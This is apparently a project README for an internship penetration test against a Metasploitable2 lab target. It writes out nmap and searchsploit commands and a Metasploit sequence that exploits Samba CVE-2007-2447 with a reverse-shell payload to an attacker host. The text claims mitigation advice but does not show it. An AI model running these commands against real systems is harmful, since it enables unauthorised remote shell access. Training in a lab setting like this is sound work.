
Hands-on pentest project using Kali Linux vs Metasploitable2. Includes full workflow: Nmap scanning, enumeration, Metasploit exploitation (Samba CVE-2007-2447), post-exploitation validation, and mitigation steps. Repo contains commands, outputs, and report showing both offensive techniques and defensive recommendations.
Internship Project 2 — Penetration Testing on Metasploitable2
Summary: This project demonstrates a complete penetration testing workflow: reconnaissance, enumeration, exploitation, post-exploitation validation, and mitigation recommendations. The target used is Metasploitable2 and the attack box is Kali Linux.
Tools: Kali Linux (attacker) Nmap (recon) Metasploit Framework (exploitation) SearchSploit / Exploit-DB (triage)
Steps performed:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Identified services (examples): vsftpd 2.3.4 (port 21 banner), Samba smbd 3.x (port 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Matched services to potential exploits (vsftpd backdoor, Samba username-map).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Obtained interactive shell and validated user context.id uname -aResult Successfully obtained a remote shell via a Samba exploit, documented the attack path, and produced a mitigation plan. Full logs and command outputs are stored in the scans/ folder.